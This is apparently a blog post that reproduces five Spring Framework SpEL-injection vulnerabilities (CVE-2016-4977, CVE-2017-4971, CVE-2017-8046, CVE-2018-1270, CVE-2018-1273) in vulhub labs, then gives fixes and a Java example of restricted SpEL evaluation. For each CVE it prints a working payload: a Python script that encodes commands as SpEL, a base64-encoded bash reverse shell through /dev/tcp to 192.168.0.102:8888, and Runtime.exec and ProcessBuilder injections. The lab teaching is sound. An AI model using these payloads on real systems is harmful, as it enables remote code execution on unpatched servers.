Spring Framework vulnerability reproduce hodgepodge! ! !

  • I searched half a lifetime for spring; you smiled, and that was it.

General overview:

  • Spring Framework is an open-source framework whose core is Inversion of Control (IoC) and Aspect-Oriented Programming (AOP). Briefly, Spring is a layered, lightweight, one-stop open-source full-stack framework for Java SE/EE. Put simply, objects that a programmer used to create with the new constructor are instead created by Spring. By analogy with Struts 2, where most vulnerabilities stem from OGNL, Spring's introduction of SpEL has likewise caused a lot of security holes: every benefit has its drawback.
  • This post mainly reproduces (using vulhub one-click builds) several vulnerabilities that are all caused by SpEL expressions; an attacker can inject a malicious SpEL expression to execute arbitrary commands.

Vulnerable versions:

  • Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
    Spring Security OAuth 2.0 – 2.0.9
    Spring Security OAuth 1.0 – 1.0.5
  • Spring WebFlow Remote Code Execution Vulnerability (CVE-2017-4971)
    Spring Web Flow 2.4.0 – 2.4.4
  • Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)
    Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
    Spring Boot version < 2.0.0M4
    Spring Data release trains < Kay-RC3
  • Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
    Spring Framework 5.0 – 5.0.4
    Spring Framework 4.3 – 4.3.14
  • Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
    Spring Data Commons 1.13 – 1.13.10
    Spring Data Commons 2.0 – 2.0.5

Vulnerability Overview:

  • Spring Security OAuth provides OAuth authentication support for the Spring Framework and is divided into an Authorization Service and a Resource Service. This vulnerability lies in how the Whitelabel error view handles user input: an already-authorized attacker can execute commands remotely by constructing a malicious SpEL expression.

  • Spring Web Flow is built on Spring MVC and lets a web application implement "flows". A flow encapsulates a series of steps that guide the user through a business task. It is best suited to stateful web applications with controlled navigation, such as shopping logic or adding a confirmation step to a form. If we control the field used in the data-binding expression, a malicious SpEL expression can be constructed to execute commands remotely.

  • Spring Data is a higher-level abstraction of data access; with it, developers are freed further from the data layer and can focus on business logic. Spring Data REST is built on Spring Data and helps developers build REST-style web services more easily. In the PATCH method of the REST API, the value of path is passed to setValue, which leads to the evaluation of a malicious SpEL expression and triggers remote command execution.

  • Spring Messaging provides messaging support for the Spring Framework. Its upper-layer protocol is STOMP, with SockJS as the underlying transport: STOMP packages data into a text stream, the text stream is sent over SockJS, and SockJS picks a suitable channel, WebSocket (new) or Ajax (old), to communicate with the back end. Because the selector is written as a SpEL expression and parsed with StandardEvaluationContext (whose permissions are far too broad), a command execution vulnerability results.

  • Spring Data is used to simplify database access and supports open-source cloud-service frameworks. An important concept in Spring Data Commons is the Spring Data Repository abstraction, which greatly reduces data-access-layer code. When a project uses Spring Data's automatic matching of user-input parameters for its web properties, the key names of a form submitted by the user are injected as SpEL expressions, so an attacker can inject a malicious SpEL expression to execute arbitrary commands.

Vulnerability reproduction:

  • Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
    The vulnerability can be triggered in either of these two ways:
    oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test
    oauth/authorize?response_type=token&client_id=acme&redirect_uri=${2*2}
    Then generate the reverse-shell POC; the reverse-shell command has to be converted into a SpEL statement:
#!/usr/bin/env python3

# Read the command to encode (Python 3: input() returns a plain string).
message = input('Enter message to encode:')

# Build the SpEL expression character by character with Character.toString(codepoint).
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'

print(poc)

Example message to encode (the reverse-shell command used here):
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAyLzg4ODggMD4mMQo=}|{base64,-d}|{bash,-i}

Once the POC has generated the SpEL expression, sending that expression in the request gets a shell successfully.

  • Spring WebFlow Remote Code Execution Vulnerability (CVE-2017-4971)
    In the official spring-webflow sample (hotel booking), book a hotel, fill in the information and click "Process" (from here on, WebFlow is already running).

    Then click "Confirm", capture the request and add the reverse-shell parameter; the server returns 500 and you get a shell successfully.

_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/ip/port 0>&1")).start()=hellowrod (must be URL-encoded, because it contains special characters)

  • Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)

    First, a few notes:
    1. Content-Type: application/json-patch+json
    2. The request data must be a JSON array
    3. The JSON data submitted with the PATCH method must contain a path member to locate the data and an op member, whose allowed values are:

    op       meaning
    add      add data
    remove   delete data
    replace  modify data
    move     move data
    copy     copy data
    test     test whether the given data equals the data at the specified position

    For the Person added above, for example, to modify its lastName property, request with the following data:
    [{ "op": "replace", "path": "/lastName", "value": "hellocat" }]
    Then construct the payload: the value of path is a SpEL expression,

[{ "op": "replace", "path": "T(SpEL expression)/lastname", "value": "hellocat" }]

Capture the request, change the method to OPTIONS, and view the content types and methods the request allows.

Replacing the patch with a reverse-shell statement, we can successfully get a shell.

  • Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
    To build:
    git clone https://github.com/spring-guides/gs-messaging-stomp-websocket
    cd complete
    ./mvnw spring-boot:run
    Once the build succeeds, click Connect, capture the request, and append the payload \nselector:new java.lang.ProcessBuilder("touch /tmp/sucesss").start() ; the command then executes successfully.

  • Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
    First capture the request from the login page and send it to Repeater.

payload: username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=

Then replace the username with the payload and send the modified data; you can see the command executed successfully.

Bug fixes:

  • Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
    1. Disable the Whitelabel error page in production
    2. Upgrade to a patched version

  • Spring WebFlow remote code execution vulnerability (CVE-2017-4971)
    1. Always declare data binding explicitly in the view state, so that a form submission cannot arbitrarily set fields that should not be settable on the target object.
    2. Upgrade to a patched version

  • Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)
    Upgrade to a patched version

  • Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
    Upgrade to a patched version

  • Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
    Upgrade to a patched version
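As an added illustration of what the Messaging and Data Commons upgrades actually change (this is example code written for this post, not code from the original article or from the Spring project): the patched releases stop evaluating user-controlled input with StandardEvaluationContext and use SimpleEvaluationContext, which exposes only property access and ordinary method calls. It assumes spring-expression 4.3.15 / 5.0.5 or later on the classpath; the Booking root object is a constructed stand-in for a form bean or message headers.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

public class RestrictedSpelDemo {

    // Constructed root object standing in for the bean user input is bound against.
    public static class Booking {
        private final String guest;
        public Booking(String guest) { this.guest = guest; }
        public String getGuest() { return guest; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Evaluates an untrusted expression with the read-only data-binding context.
    // Property access and plain method calls on the root still work; type references
    // T(...), constructors (new ...) and Object/Class methods such as getClass()
    // are not resolvable in this context and fail with an EvaluationException.
    static String evaluateRestricted(String expression, Object root) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(root)
                .build();
        Expression expr = PARSER.parseExpression(expression);
        try {
            Object value = expr.getValue(ctx);
            return "allowed: " + value;
        } catch (EvaluationException e) {
            // Input that tries to leave the data-binding subset lands here.
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        Booking root = new Booking("alice");
        // Benign data-binding expressions are still evaluated.
        System.out.println(evaluateRestricted("guest", root));
        System.out.println(evaluateRestricted("guest.toUpperCase()", root));
        // The building blocks of every payload on this page are refused.
        System.out.println(evaluateRestricted("T(java.lang.Runtime)", root));
        System.out.println(evaluateRestricted("#this.getClass()", root));
        System.out.println(evaluateRestricted("new java.lang.StringBuilder()", root));
    }
}
```

If a component cannot upgrade yet, the same context swap is the targeted fix: anywhere a request field, header or form key reaches a SpEL parser, StandardEvaluationContext has to go.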

    I'm a newbie; the road ahead is long, please advise.


Origin blog.csdn.net/csacs/article/details/87951940